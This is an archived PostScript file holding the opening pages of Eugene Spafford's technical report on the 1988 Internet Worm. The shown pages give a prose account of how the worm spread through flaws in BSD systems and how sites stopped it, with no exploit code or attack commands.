DataMuseum.dk

top - metrics - download

    Length: 172872 (0x2a348)
    Types: TextFile
    Names: »TR933.PS«

└─⟦4f9d7c866⟧ Bits:30007245 EUUGD6: Sikkerheds distributionen
    └─⟦this⟧ »./worm/TR933.PS« 

TextFile

%!PS-Adobe-1.0
%%Creator: devps (Pipeline Associates, Inc.)
%%CreationDate: Thu Sep 19 16:52:50 1991
%%Pages: (atend)
%%DocumentFonts: (atend)

/X /exch load def
/r /rmoveto load def
/m /moveto load def
/l /lineto load def
/rl /rlineto load def
/lc{yc X xc X l st} bind def
/mc{yc X xc X m} bind def
/el{gs /a X def a div 1 X scale cp np a xc 2 div 0 360 arc st gr} bind def
/ar{cp 7 2 roll np xc 5 1 roll atan 3 1 roll atan X arc st} bind def
/sp{yc X xc X 6 2 roll yc X xc X 6 2 roll yc X xc X 6 2 roll ct} bind def
/st /stroke load def
/gs /gsave load def
/gr /grestore load def
/cp /currentpoint load def
/np /newpath load def
/ct /curveto load def
/m0{0 0 moveto} bind def
/BP{/devps-save save def m0} bind def
/EP{
clear devps-save restore
showpage} bind def
/res 10.000000 def
/V{res neg div 792 add
currentpoint pop X
m} bind def
/H{res div
currentpoint X pop
transform round exch round exch itransform
moveto} bind def
/h{res div 0 r} bind def
/v{res neg div 0 X r} bind def
/xc{res div} bind def
/yc{res neg div 792 add} bind def
/S{X H show} bind def
/psize 10 def
/height 1 def
/slant 0 def
/FF{findfont X dup 12 div setlinewidth /psize X def
    [psize 0 psize height mul slant sin slant cos div mul psize height mul 0 0]
    makefont setfont} bind def
/shade{gs
 /dy X def
 /dx X def
 np m
 setgray
 0 dy rl
 dx 0 rl
 0 dy neg rl
 dx neg 0 rl
 closepath
 fill
gr} bind def
1 setlinecap
50 dict dup begin
/FontType 3 def
/FontName /DIThacks def
/FontMatrix [.001 0.0 0.0 .001 0.0 0.0] def
/FontBBox [-220 -280 1000 1000] def
/Encoding 256 array def
0 1 255{Encoding exch /.notdef put}for
Encoding
 dup 8#040/space put 
 dup 8#110/rc put 
 dup 8#111/lt put 
 dup 8#112/bv put 
 dup 8#113/lk put 
 dup 8#114/lb put 
 dup 8#115/rt put 
 dup 8#116/rk put 
 dup 8#117/rb put 
 dup 8#120/rf put 
 dup 8#121/lf put 
 dup 8#122/lc put 
 dup 8#140/sq put 
 dup 8#141/bx put 
 dup 8#142/ci put 
 dup 8#143/br put 
 dup 8#144/rn put 
 dup 8#145/vr put 
 dup 8#146/ob put 
 dup 8#147/bu put 
 dup 8#150/ru put 
 dup 8#151/ul put 
 dup 8#326/sr put
 pop
/DITfd 100 dict def
/BuildChar{0 begin
 /cc exch def /fd exch def
 /charname fd /Encoding get cc get def
 /charwid fd /Metrics get charname get def
 /charproc fd /CharProcs get charname get def
 charwid 0 fd /FontBBox get aload pop setcachedevice
 2 setlinejoin 40 setlinewidth
 newpath 0 0 moveto gsave charproc grestore
 end}def
/BuildChar load 0 DITfd put
/CharProcs 50 dict def
CharProcs begin
/space{}def
/.notdef{}def
/ru{500 0 rls}def
/rn{0 750 moveto 500 0 rls}def
/vr{0 800 moveto 0 -770 rls}def
/bv{0 800 moveto 0 -1000 rls}def
/br{0 750 moveto 0 -1000 rls}def
/ul{0 -250 moveto 500 0 rls}def
/ob{200 250 rmoveto currentpoint newpath 200 0 360 arc closepath stroke}def
/bu{200 250 rmoveto currentpoint newpath 200 0 360 arc closepath fill}def
/sq{80 0 rmoveto currentpoint dround newpath moveto
    640 0 rlineto 0 640 rlineto -640 0 rlineto closepath stroke}def
/bx{80 0 rmoveto currentpoint dround newpath moveto
    640 0 rlineto 0 640 rlineto -640 0 rlineto closepath fill}def
/ci{355 333 rmoveto currentpoint newpath 333 0 360 arc
    50 setlinewidth stroke}def

/lt{0 -200 moveto 0 550 rlineto currx 800 2cx s4 add exch s4 a4p stroke}def
/lb{0 800 moveto 0 -550 rlineto currx -200 2cx s4 add exch s4 a4p stroke}def
/rt{0 -200 moveto 0 550 rlineto currx 800 2cx s4 sub exch s4 a4p stroke}def
/rb{0 800 moveto 0 -500 rlineto currx -200 2cx s4 sub exch s4 a4p stroke}def
/lk{0 800 moveto 0 300 -300 300 s4 arcto pop pop 1000 sub
    0 300 4 2 roll s4 a4p 0 -200 lineto stroke}def
/rk{0 800 moveto 0 300 s2 300 s4 arcto pop pop 1000 sub
    0 300 4 2 roll s4 a4p 0 -200 lineto stroke}def
/lf{0 800 moveto 0 -1000 rlineto s4 0 rls}def
/rf{0 800 moveto 0 -1000 rlineto s4 neg 0 rls}def
/lc{0 -200 moveto 0 1000 rlineto s4 0 rls}def
/rc{0 -200 moveto 0 1000 rlineto s4 neg 0 rls}def
/sr{395.744681 0 moveto 557.446809 995.744681 lineto 521.276596 1000 lineto
    382.978723 170.212766 lineto 168.085106 602.127660 lineto
    8.510638 525.531915 lineto 23.404255 496.170213 lineto
    127.659574 546.808511 lineto 395.744681 0 lineto closepath fill} def
end

/Metrics 50 dict def Metrics begin
/.notdef 0 def
/space 500 def
/ru 500 def
/br 0 def
/lt 416 def
/lb 416 def
/rt 416 def
/rb 416 def
/lk 416 def
/rk 416 def
/rc 416 def
/lc 416 def
/rf 416 def
/lf 416 def
/bv 416 def
/ob 350 def
/bu 350 def
/ci 750 def
/bx 750 def
/sq 750 def
/rn 500 def
/ul 500 def
/vr 0 def
/sr 750 def
end

DITfd begin
/s2 500 def /s4 250 def /s3 333 def
/a4p{arcto pop pop pop pop}def
/2cx{2 copy exch}def
/rls{rlineto stroke}def
/currx{currentpoint pop}def
/dround{transform round exch round exch itransform} def
end
end
/DIThacks exch definefont pop


/DocumentInitState [ matrix currentmatrix currentlinewidth currentlinecap
currentlinejoin currentdash currentgray currentmiterlimit ] cvx def

/resolution 720 def

/startFig {
      /SavedState save def
      userdict maxlength dict begin
      currentpoint transform

      DocumentInitState setmiterlimit setgray setdash setlinejoin setlinecap
              setlinewidth setmatrix

      itransform moveto

      /ury exch def
      /urx exch def
      /lly exch def
      /llx exch def
      /y exch 72 mul resolution div def
      /x exch 72 mul resolution div def

      currentpoint /cy exch def /cx exch def

      /sx x urx llx sub div def       % scaling for x
      /sy y ury lly sub div def       % scaling for y

      sx sy scale                     % scale by (sx,sy)

      cx sx div llx sub
      cy sy div ury sub translate

      /DefFigCTM matrix currentmatrix def

      /initmatrix {
              DefFigCTM setmatrix
      } def
      /defaultmatrix {
              DefFigCTM exch copy
      } def

      /initgraphics {
              DocumentInitState setmiterlimit setgray setdash
                      setlinejoin setlinecap setlinewidth setmatrix
              DefFigCTM setmatrix
      } def

      /showpage {
              initgraphics
      } def

} def
/clipFig {
      currentpoint 6 2 roll
      newpath 4 copy
      4 2 roll moveto
      6 -1 roll exch lineto
      exch lineto
      exch lineto
      closepath clip
      newpath
      moveto
} def
/doclip { llx lly urx ury clipFig } def
/endFig {
      end SavedState restore
} def
/globalstart {
      % Push details about the enviornment on the stack.
      fontnum fontsize fontslant fontheight
      % firstpage
      mh my resolution slotno currentpoint
      pagesave restore gsave
} def
/globalend {
      grestore moveto
      /slotno exch def /resolution exch def /my exch def
      /mh exch def
      % /firstpage exch def
      /fontheight exch def
      /fontslant exch def /fontsize exch def /fontnum exch def
      F
      /pagesave save def
} def
/C{/Courier FF}def
/R{/Times-Roman FF}def
/B{/Times-Bold FF}def
/I{/Times-Italic FF}def
/Y{/Symbol FF}def
%% Troff special characters not on Symbol font
%% Copyright (C) 1986 by Pipeline Associates, Inc.
%% Version 1.0
/altRTD 20 dict def
altRTD begin
/s{setcachedevice}def
/C{1000 1000 scale}def
/m /moveto load def
/c /curveto load def
/S /stroke load def
/l /lineto load def
/a /arcto load def
/p /pop load def
/sl /setlinewidth load def

end
/F_Troff 17 dict def F_Troff begin
systemdict /currentpacking known
{/SavePacking currentpacking def true setpacking}if
/PaintType 0 def
/FontType 3 def
/StrokeWidth 0 def
/UniqueID 8277003 def
/FontMatrix [.001000 0 0 .001000 0 0] def
/FontBBox [-12 -105 942 855 ] def
/Encoding 256 array def
/CD 256 1 add dict def
/FontInfo 3 dict def FontInfo begin
/UnderlinePosition -133 def /UnderlineThickness 20 def end
/FontName (Troff) def
0 1 256 1 sub{Encoding exch /.notdef put}for
CD /.notdef{500 0 setcharwidth{}}put
Encoding (1) 0 get /br put
%% bold vertical rule used by tbl
CD /br{
C
0 0 -.5 -.5 1 1 s
np
.05 sl
0 -.1 m
0 .9 l
{S}
}put
Encoding (2) 0 get /ul put
%% underline used by tbl
CD /ul{
C
.5 0 -.5 -.5 1 1 s
np
.05 sl
0 -.1 m
.5 -.1 l
{S}
}put
Encoding (3) 0 get /ru put
%% baseline rule
CD /ru{
C
.5 0 -.5 -.5 1 1 s
np
.05 sl
m0
.5 0 l
{S}
}put
Encoding (4) 0 get /vr put
%% vertical rule
CD /vr{
C
0 0 -.5 -.5 1 1 s
np
.05 sl
m0
0 1 l
{S}
}put
Encoding (5) 0 get /sq put
%% square
CD /sq{
C
.5 0 -.5 -.5 1 1 s
np
.05 sl
0 .25 m
0 .5 rl
.5 0 rl
0 -.5 rl
-.5 0 rl
closepath
{S}
}put
Encoding (6) 0 get /bx put
%% solid box
CD /bx{
C
.5 0 -.5 -.5 1 1 s
np
0 .25 m
0 .5 rl
.5 0 rl
0 -.5 rl
-.5 0 rl
closepath
{fill}
}put
Encoding (7) 0 get /rn put
%% radical extender
CD /rn{
C
.5 0 -.5 -.5 1 1 s
np
.03 sl
-.03 .9 m
.5 0 rl
{S}
}put
Encoding (8) 0 get /GR put
%% gray mask
CD /GR{
C
.5 0 setcharwidth
.5 setgray
np
0 -.1 m
0 1 rl
.5 0 rl
0 -1 rl
-.5 0 rl
closepath
{fill}
}put
Encoding 97 /a put
CD /a{1000 0 0 66 942 421 s 430 415
m 578 406 678 349 662 319 c 655 306 614 287 583
296 c 570 300 466 340 438 332 c 365 309 335 213
270 209 c 0 310 m 108 310 l 108 114 l 0
114 l 0 310 l 42 161 m 42 134 l 66 134 l 66
161 l 42 161 l 47 155 m 47 140 l 62 140 l 62
155 l 47 155 l 110 133 m 226 113 300 66 410
80 c 497 91 550 69 634 76 c 645 76 663 92 669
107 c 677 125 673 141 668 160 c 725 334 m 758
332 734 253 701 250 c 501 325 m 475 316 476 309
473 302 c 465 282 482 263 499 257 c 552 236 615
253 689 253 c 701 253 713 236 713 218 c 712 194
702 168 678 161 c 671 159 663 160 655 160 c 591
158 516 156 479 168 c 461 173 453 191 453 210 c 453
224 456 235 466 244 c 476 253 490 252 503 255 c 459
84 m 447 96 435 106 435 123 c 435 136 440 145 447
155 c 453 163 462 168 469 173 c 110 293 m 173
318 300 421 435 415 c 609 407 852 416 885 411 c 898
409 924 411 930 380 c 942 316 828 339 742 334 c 731
334 730 335 725 335 c 701 336 685 336 660 336 c{S}}put
Encoding 98 /b put
CD /b{1000 0 -12 66 930 421 s 500
415 m 352 406 252 349 268 319 c 275 306 316 287
347 296 c 360 300 464 340 492 332 c 565 309 595
213 660 209 c 930 310 m 822 310 l 822 114 l 930
114 l 930 310 l 888 161 m 888 134 l 864 134
l 864 161 l 888 161 l 883 155 m 883 140 l 868
140 l 868 155 l 883 155 l 820 133 m 704 113
630 66 520 80 c 433 91 380 69 296 76 c 285 76
267 92 261 107 c 253 125 257 141 262 160 c 205
334 m 172 332 196 253 229 250 c 429 325 m 455
316 454 309 457 302 c 465 282 448 263 431 257 c 378
236 315 253 241 253 c 229 253 217 236 217 218 c 218
194 228 168 252 161 c 259 159 267 160 275 160 c 339
158 414 156 451 168 c 469 173 477 191 477 210 c 477
224 474 235 464 244 c 454 253 440 252 427 255 c 471
84 m 483 96 495 106 495 123 c 495 136 490 145 483
155 c 477 163 468 168 461 173 c 820 293 m 757
318 630 421 495 415 c 321 407 78 416 45 411 c 32
409 6 411 0 380 c -12 316 102 339 188 334 c 199
334 200 335 205 335 c 229 336 245 336 270 336 c{S}}put
Encoding 99 /c put
CD /c{1000 0 184 0 827 627 s 185 315
m 186 488 332 627 505 625 c 682 623 827 467 815
290 c 804 124 666 0 500 0 c 327 0 184 142 185
315 c{S}}put
Encoding 100 /d put
CD /d{590 0 134 158 477 500 s 300
160 m 208 162 134 238 135 330 c 136 423 212 500
305 500 c 397 500 473 427 475 335 c 477 239 396
158 300 160 c{fill}}put
Encoding 101 /e put	% Bell Symbol
CD /e{1010 0 -100 -210 1010 1010 s 100 sl 0 setlinecap
420 300 450 0 360 arc
420 650 m 420 575 l S
newpath 120 125 m 720 125 l 75 sl S
420 125 m 420 25 l S
220 400 m 220 175 120 175 100 a p p p p
220 400 m 220 550 420 550 80 a p p p p 
620 400 m 620 175 720 175 100 a p p p p
620 400 m 620 550 420 550 80 a p p p p
295 550 m 545 550 l{S}}put
/BuildChar{altRTD /BuildChar get exec}def end
altRTD begin /BuildChar{altRTD begin
/char exch def /fontdict exch def save
/charname fontdict /Encoding get char get def
fontdict /StrokeWidth get sl
fontdict /CD get dup charname known
{charname}{/.notdef}ifelse get newpath exec
fontdict /PaintType get 0 eq{exec}{p S}ifelse
restore end}def end
systemdict /currentpacking known{F_Troff /SavePacking get setpacking}if
/Troff F_Troff definefont pop
/Y1{/Troff FF}def
%%EndProlog
%%Page: 0 1
BP
/slant 0 def
/height 1.000000 def
10 C
10 R
1230 V
12 B
2135(The)S
2371(Internet)S
2827(Worm)S
3196(Incident)S
1530 V
2056(Technical)S
2593(Report)S
2988(CSD-TR-933)S
1470 V
10 B
3653(*)S
1770 V
10 I
2479(Eugene)S
2808(H.)S
2935(Spafford)S
1950 V
10 R
2183(Department)S
2684(of)S
2797(Computer)S
3227(Sciences)S
2070 V
2512(Purdue)S
2825(University)S
2190 V
2123(West)S
2358(Lafayette,)S
2789(IN)S
2924(USA)S
3154(47907-2004)S
2430 V
2474(spaf@cs.purdue.edu)S
2946 V
1330(On)S
1497(the)S
1664(evening)S
2025(of)S
2154(2)S
2250(November)S
2717(1988,)S
2988(someone)S
3389(``infected'')S
3888(the)S
4056(Internet)S
4412(with)S
4636(a)S
3066 V
10 I
1080(worm)S
10 R
1347(program.)S
1779(That)S
2000(program)S
2376(exploited)S
2786(\257aws)S
3035(in)S
3151(utility)S
3429(programs)S
3844(in)S
3960(systems)S
4315(based)S
4580(on)S
3186 V
1080(BSD-derived)S
1655(versions)S
2036(of)S
2167(U)S
8 R
2239(NIX)S
10 R
2381(.)S
2484(The)S
2687(\257aws)S
2946(allowed)S
3310(the)S
3480(program)S
3867(to)S
3994(break)S
4264(into)S
4469(those)S
3306 V
1080(machines)S
1490(and)S
1667(copy)S
1894(itself,)S
2152(thus)S
2352(infecting)S
2740(those)S
2984(systems.)S
3389(This)S
3600(program)S
3971(eventually)S
4420(spread)S
3426 V
1080(to)S
1195(thousands)S
1632(of)S
1752(machines,)S
2191(and)S
2372(disrupted)S
2782(normal)S
3103(activities)S
3502(and)S
3684(Internet)S
4032(connectivity)S
4564(for)S
3546 V
1080(many)S
1332(days.)S
3702 V
1330(This)S
1547(paper)S
1807(explains)S
2180(why)S
2392(this)S
2577(program)S
2955(was)S
3150(a)S
3234(worm)S
3507(\(as)S
3663(opposed)S
4036(to)S
4154(a)S
4238(virus\),)S
4536(and)S
3822 V
1080(provides)S
1460(a)S
1539(brief)S
1762(chronology)S
2252(of)S
2370(both)S
2583(the)S
2740(spread)S
3035(and)S
3214(eradication)S
3692(of)S
3810(the)S
3967(program.)S
4395(That)S
4613(is)S
3942 V
1080(followed)S
1471(by)S
1607(discussion)S
2060(of)S
2179(some)S
2426(speci\256c)S
2767(issues)S
3042(raised)S
3317(by)S
3454(the)S
3613(community's)S
4178(reaction)S
4536(and)S
4062 V
1080(subsequent)S
1559(discussion)S
2011(of)S
2129(the)S
2286(event.)S
2592(Included)S
2976(are)S
3132(some)S
3378(interesting)S
3835(lessons)S
4159(learned)S
4486(from)S
4182 V
1080(the)S
1232(incident.)S
4662 V
720(September)S
1177(19,)S
1332(1991)S
7920 V
EP
%%Page: 1 2
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
1230 V
12 B
2135(The)S
2371(Internet)S
2827(Worm)S
3196(Incident)S
1530 V
2056(Technical)S
2593(Report)S
2988(CSD-TR-933)S
1470 V
10 B
3653(*)S
1770 V
10 I
2479(Eugene)S
2808(H.)S
2935(Spafford)S
1950 V
10 R
2183(Department)S
2684(of)S
2797(Computer)S
3227(Sciences)S
2070 V
2512(Purdue)S
2825(University)S
2190 V
2123(West)S
2358(Lafayette,)S
2789(IN)S
2924(USA)S
3154(47907-2004)S
2430 V
2474(spaf@cs.purdue.edu)S
2790 V
10 B
720(1.)S
855(Introduction)S
2946 V
10 R
970(Worldwide,)S
1477(over)S
1687(60,000)S
1995(computers)S
2896 V
7 R
2411(\262)S
2946 V
10 R
2479(in)S
2590(interconnecting)S
3244(networks)S
3644(communicate)S
4216(using)S
4467(a)S
4545(common)S
4929(set)S
3066 V
720(of)S
845(protocols\320the)S
1481(Internet)S
1833(Protocols)S
2252(\(IP\).[7,)S
2556(15])S
2730(On)S
2893(the)S
3056(evening)S
3413(of)S
3537(2)S
3628(November)S
4090(1988)S
4331(this)S
4517(network)S
4885(\(the)S
3186 V
720(Internet\))S
1097(came)S
1341(under)S
1603(attack)S
1876(from)S
2105(within.)S
2451(Sometime)S
2892(after)S
3109(5)S
3194(PM)S
3374(EST,)S
3612(a)S
3691(program)S
4064(was)S
4254(executed)S
4643(on)S
4778(one)S
4957(or)S
3306 V
720(more)S
957(of)S
1072(these)S
1309(hosts.)S
1602(That)S
1817(program)S
2187(collected)S
2579(host,)S
2803(network,)S
3187(and)S
3363(user)S
3561(information,)S
4090(then)S
4294(used)S
4509(that)S
4691(informa-)S
3426 V
720(tion)S
907(to)S
1016(establish)S
1397(network)S
1755(connections)S
2263(and)S
2438(break)S
2691(into)S
2879(other)S
3116(machines)S
3525(using)S
3774(\257aws)S
4017(present)S
4337(in)S
4447(those)S
4690(systems')S
3546 V
720(software.)S
1159(After)S
1410(breaking)S
1800(in,)S
1944(the)S
2107(program)S
2486(would)S
2777(replicate)S
3161(itself)S
3402(and)S
3587(the)S
3750(replica)S
4062(would)S
4353(attempt)S
4694(to)S
4813(infect)S
3666 V
720(other)S
966(systems)S
1324(in)S
1443(the)S
1606(same)S
1852(manner.)S
2247(Although)S
2666(the)S
2830(program)S
3210(would)S
3502(only)S
3722(infect)S
3991(Sun)S
4189(Microsystems)S
4792(Sun)S
4990(3)S
3786 V
720(systems,)S
1101(and)S
1284(V)S
8 R
1356(AX)S
3746 V
8 Y
1472(\324)S
3786 V
10 R
1582(computers)S
2037(running)S
2387(variants)S
2743(of)S
2866(4)S
2956(BSD)S
3736 V
7 R
3151(\263)S
3786 V
10 R
3226(U)S
8 R
3298(NIX)S
10 R
3440(,)S
3736 V
10 Y
3465(\322)S
3786 V
10 R
3584(the)S
3746(program)S
4124(spread)S
4424(quickly,)S
4789(as)S
4912(did)S
3906 V
720(the)S
878(confusion)S
1308(and)S
1488(consternation)S
2062(of)S
2181(system)S
2495(administrators)S
3103(and)S
3283(users)S
3524(as)S
3643(they)S
3851(discovered)S
4319(that)S
4505(their)S
4723(systems)S
4026 V
720(had)S
908(been)S
1140(invaded.)S
1555(Although)S
1977(U)S
8 R
2049(NIX)S
10 R
2235(has)S
2413(long)S
2636(been)S
2869(known)S
3186(to)S
3309(have)S
3542(some)S
3798(security)S
4159(weaknesses)S
4669(\(cf.)S
4849([22],)S
4146 V
720([13,)S
894(21,)S
1035(29]\),)S
1268(especially)S
1709(in)S
1829(its)S
1966(usual)S
2219(mode)S
2483(of)S
2608(operation)S
3027(in)S
3146(open)S
3381(research)S
3753(environments,)S
4363(the)S
4526(scope)S
4794(of)S
4918(the)S
4266 V
720(break-ins)S
1121(nonetheless)S
1617(came)S
1857(as)S
1970(a)S
2044(great)S
2273(surprise)S
2619(to)S
2727(almost)S
3024(everyone.)S
4422 V
970(The)S
1169(program)S
1551(was)S
1750(mysterious)S
2233(to)S
2355(users)S
2604(at)S
2720(sites)S
2942(where)S
3229(it)S
3330(appeared.)S
3789(Unusual)S
4167(\256les)S
4379(were)S
4617(left)S
4795(in)S
4918(the)S
4542 V
720(scratch)S
1033(\(/usr/tmp\))S
1463(directories)S
1914(of)S
2027(some)S
2268(machines,)S
2700(and)S
2874(strange)S
3192(messages)S
3599(appeared)S
3988(in)S
4096(the)S
4248(log)S
4406(\256les)S
4603(of)S
4716(some)S
4957(of)S
4662 V
720(the)S
872(utilities,)S
1228(such)S
1441(as)S
1554(the)S
10 I
1706(sendmail)S
10 R
2097(mail)S
2305(handling)S
2685(agent.)S
2986(The)S
3171(most)S
3396(noticeable)S
3836(e)S
3880 H
	(f)show 10 -.5 mul h (f)show
10 R
3941(ect,)S
4113(however,)S
4512(was)S
4698(that)S
4879(sys-)S
4782 V
720(tems)S
943(became)S
1281(more)S
1519(and)S
1696(more)S
1934(loaded)S
2233(with)S
2444(running)S
2788(processes)S
3203(as)S
3319(they)S
3524(became)S
3861(repeatedly)S
4309(infected.)S
4718(As)S
4862(time)S
4902 V
720(went)S
955(on,)S
1121(some)S
1373(of)S
1497(these)S
1743(machines)S
2161(became)S
2506(so)S
2636(loaded)S
2944(that)S
3136(they)S
3350(were)S
3585(unable)S
3893(to)S
4013(continue)S
4399(any)S
4585(processing;)S
5022 V
720(some)S
961(machines)S
1368(failed)S
1625(completely)S
2099(when)S
2345(their)S
2558(swap)S
2793(space)S
3044(or)S
3157(process)S
3486(tables)S
3749(were)S
3972(exhausted.)S
5178 V
970(By)S
1119(early)S
1350(Thursday)S
1759(morning,)S
2155(November)S
2608(3,)S
2715(personnel)S
3135(at)S
3239(the)S
3393(University)S
3847(of)S
3962(California)S
4399(at)S
4503(Berkeley)S
4896(and)S
5298 V
720(Massachusetts)S
1340(Institute)S
1711(of)S
1837(Technology)S
2357(had)S
2544(``captured'')S
3061(copies)S
3358(of)S
3483(the)S
3647(program)S
4027(and)S
4213(began)S
4493(to)S
4613(analyze)S
4959(it.)S
5418 V
720(People)S
1027(at)S
1134(other)S
1375(sites)S
1589(also)S
1786(began)S
2060(to)S
2174(study)S
2427(the)S
2585(program)S
2959(and)S
3139(were)S
3368(developing)S
3848(methods)S
4223(of)S
4342(eradicating)S
4821(it.)S
4968(A)S
5538 V
720(common)S
1109(fear)S
1302(was)S
1496(that)S
1685(the)S
1846(program)S
2223(was)S
2417(somehow)S
2839(tampering)S
3282(with)S
3498(system)S
3814(resources)S
4228(in)S
4344(a)S
4426(way)S
4630(that)S
4818(could)S
5658 V
720(not)S
883(be)S
1012(readily)S
1324(detected\320that)S
1941(while)S
2198(a)S
2277(cure)S
2484(was)S
2675(being)S
2933(sought,)S
3261(system)S
3575(\256les)S
3778(were)S
4007(being)S
4265(altered)S
4572(or)S
4691(informa-)S
5778 V
720(tion)S
931(destroyed.)S
1429(By)S
1601(5)S
1706(AM)S
1922(EST)S
2155(Thursday)S
2587(morning,)S
3006(less)S
3211(than)S
3438(12)S
3593(hours)S
3870(after)S
4107(the)S
4283(program)S
4675(was)S
4884(\256rst)S
5898 V
720(discovered)S
1185(on)S
1318(the)S
1473(network,)S
1858(the)S
2013(Computer)S
2446(Systems)S
2813(Research)S
3212(Group)S
3501(at)S
3607(Berkeley)S
4001(had)S
4179(developed)S
4623(an)S
4751(interim)S
6018 V
720(set)S
876(of)S
1004(steps)S
1248(to)S
1370(halt)S
1564(its)S
1703(spread.)S
2062(This)S
2284(included)S
2672(a)S
2760(preliminary)S
3270(patch)S
3530(to)S
3652(the)S
10 I
3818(sendmail)S
10 R
4223(mail)S
4445(agent,)S
4730(and)S
4918(the)S
6138 V
720(suggestion)S
1185(to)S
1300(rename)S
1630(one)S
1812(or)S
1933(both)S
2149(of)S
2270(the)S
2430(C)S
2535(compiler)S
2928(and)S
3110(loader)S
3397(to)S
3513(prevent)S
3850(their)S
4071(use.)S
4297(These)S
4573(suggestions)S
6258 V
720(were)S
965(published)S
1405(in)S
1534(mailing)S
1891(lists)S
2104(and)S
2299(on)S
2450(the)S
2623(Usenet)S
2951(network)S
3329(news)S
3585(system,)S
3939(although)S
4340(their)S
4574(spread)S
4885(was)S
6358 V
8 Y1
720(333333333333333333)S
6476 V
8 R
820(*)S
900(This)S
1075(paper)S
1284(appears)S
1559(in)S
1655(the)S
1786(Proceedings)S
2209(of)S
2309(the)S
2440(1989)S
2634(European)S
2973(Software)S
3294(Engineering)S
3717(Conference)S
4117(\(ESEC)S
4374(89\),)S
4534(pub-)S
6576 V
720(lished)S
934(by)S
1038(Springer-Verlag)S
1578(as)S
1668(#87)S
1812(in)S
1898(the)S
2019(``Lecture)S
2337(Notes)S
2547(in)S
2633(Computer)S
2976(Science'')S
3299(series.)S
6694 V
820(\262)S
900(As)S
1018(presented)S
1351(by)S
1461(Mark)S
1663(Lottor)S
1892(at)S
1979(the)S
2106(October)S
2392(1988)S
2582(Internet)S
2858(Engineering)S
3277(Task)S
3462(Force)S
3673(\(IETF\))S
3924(meeting)S
4210(in)S
4302(Ann)S
4470(Arbor,)S
6794 V
720(MI.)S
6912 V
820(\263)S
900(BSD)S
1081(is)S
1158(an)S
1257(acronym)S
1559(for)S
1675(Berkeley)S
1986(Software)S
2297(Distribution.)S
7030 V
8 Y
820(\322)S
8 R
923(U)S
6 R
981(NIX)S
8 R
1111(is)S
1188(a)S
1247(registered)S
1583(trademark)S
1928(of)S
2018(AT&T)S
2260(Laboratories.)S
7148 V
8 Y
820(\324)S
8 R
931(V)S
6 R
989(AX)S
8 R
1099(is)S
1176(a)S
1235(trademark)S
1580(of)S
1670(Digital)S
1915(Equipment)S
2289(Corporation.)S
7920 V
EP
%%Page: 2 3
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2792(- 2 -)S
840 V
720(hampered)S
1143(by)S
1273(systems)S
1620(disconnected)S
2171(from)S
2395(the)S
2547(Internet)S
2887(in)S
2995(an)S
3119(attempt)S
3449(to)S
3557(``quarantine'')S
4140(them.)S
996 V
970(By)S
1119(about)S
1373(9)S
1455(PM)S
1633(EST)S
1844(Thursday,)S
2279(another)S
2611(simple,)S
2936(e)S
2980 H
	(f)show 10 -.5 mul h (f)show
10 R
3041(ective)S
3312(method)S
3645(of)S
3761(stopping)S
4139(the)S
4294(invading)S
4677(program,)S
1116 V
720(without)S
1064(altering)S
1407(system)S
1722(utilities,)S
2085(was)S
2277(discovered)S
2746(at)S
2855(Purdue)S
3175(and)S
3356(also)S
3554(widely)S
3863(published.)S
4344(Software)S
4741(patches)S
1236 V
720(were)S
952(posted)S
1252(by)S
1391(the)S
1552(Berkeley)S
1951(group)S
2223(at)S
2334(the)S
2495(same)S
2739(time)S
2956(to)S
3073(mend)S
3334(all)S
3473(the)S
3634(\257aws)S
3884(that)S
4073(enabled)S
4422(the)S
4584(program)S
4962(to)S
1356 V
720(invade)S
1025(systems.)S
1436(All)S
1603(that)S
1792(remained)S
2202(was)S
2396(to)S
2513(analyze)S
2856(the)S
3017(code)S
3243(that)S
3431(caused)S
3740(the)S
3900(problems)S
4310(and)S
4492(discover)S
4868(who)S
1476 V
720(had)S
894(unleashed)S
1323(the)S
1475(worm\320and)S
1982(why.)S
2239(In)S
2352(the)S
2504(weeks)S
2783(that)S
2963(followed,)S
3373(other)S
3609(well-publicized)S
4261(computer)S
4669(break-ins)S
1596 V
720(occurred)S
1103(and)S
1282(many)S
1539(debates)S
1873(began)S
2146(about)S
2403(how)S
2610(to)S
2723(deal)S
2924(with)S
3137(the)S
3294(individuals)S
3774(staging)S
4098(these)S
4337(break-ins,)S
4767(who)S
4973(is)S
1716 V
720(responsible)S
1208(for)S
1357(security)S
1706(and)S
1883(software)S
2259(updates,)S
2622(and)S
2799(the)S
2954(future)S
3225(roles)S
3452(of)S
3569(networks)S
3969(and)S
4147(security.)S
4552(The)S
4741(conclu-)S
1836 V
720(sion)S
926(of)S
1048(these)S
1292(discussions)S
1786(may)S
1996(be)S
2128(some)S
2377(time)S
2593(in)S
2709(coming)S
3047(because)S
3400(of)S
3521(the)S
3681(complexity)S
4169(of)S
4290(the)S
4450(topics,)S
4752(but)S
4918(the)S
1956 V
720(ongoing)S
1089(debate)S
1390(should)S
1698(be)S
1833(of)S
1957(interest)S
2292(to)S
2411(computer)S
2829(professionals)S
3397(everywhere.)S
3957(A)S
4070(few)S
4260(of)S
4385(those)S
4638(issues)S
4919(are)S
2076 V
720(summarized)S
1238(later.)S
2232 V
970(After)S
1223(a)S
1311(brief)S
1543(discussion)S
2004(of)S
2131(why)S
2347(the)S
2513(November)S
2978(2nd)S
3172(program)S
3554(has)S
3731(been)S
3963(called)S
4245(a)S
10 I
4333(worm,)S
10 R
4630(this)S
4819(paper)S
2352 V
720(describes)S
1131(how)S
1343(the)S
1505(program)S
1883(worked.)S
2277(This)S
2494(is)S
2600(followed)S
2994(by)S
3133(a)S
3216(chronology)S
3710(of)S
3832(the)S
3993(spread)S
4292(and)S
4475(eradication)S
4957(of)S
2472 V
720(the)S
886(Worm,)S
1210(and)S
1398(concludes)S
1841(with)S
2063(some)S
2318(observations)S
2867(and)S
3056(remarks)S
3422(about)S
3689(the)S
3856(community's)S
4429(reaction)S
4795(to)S
4918(the)S
2592 V
720(whole)S
994(incident,)S
1371(as)S
1484(well)S
1686(as)S
1799(some)S
2040(remarks)S
2391(about)S
2643(potential)S
3023(consequences)S
3601(for)S
3747(the)S
3899(author)S
4184(of)S
4297(the)S
4449(Worm.)S
2832 V
10 B
720(2.)S
855(Terminology)S
2988 V
10 R
970(There)S
1251(seems)S
1544(to)S
1672(be)S
1816(considerable)S
2370(variation)S
2775(in)S
2903(the)S
3075(names)S
3380(applied)S
3724(to)S
3852(the)S
4024(program)S
4412(described)S
4844(here.)S
3108 V
720(Many)S
984(people)S
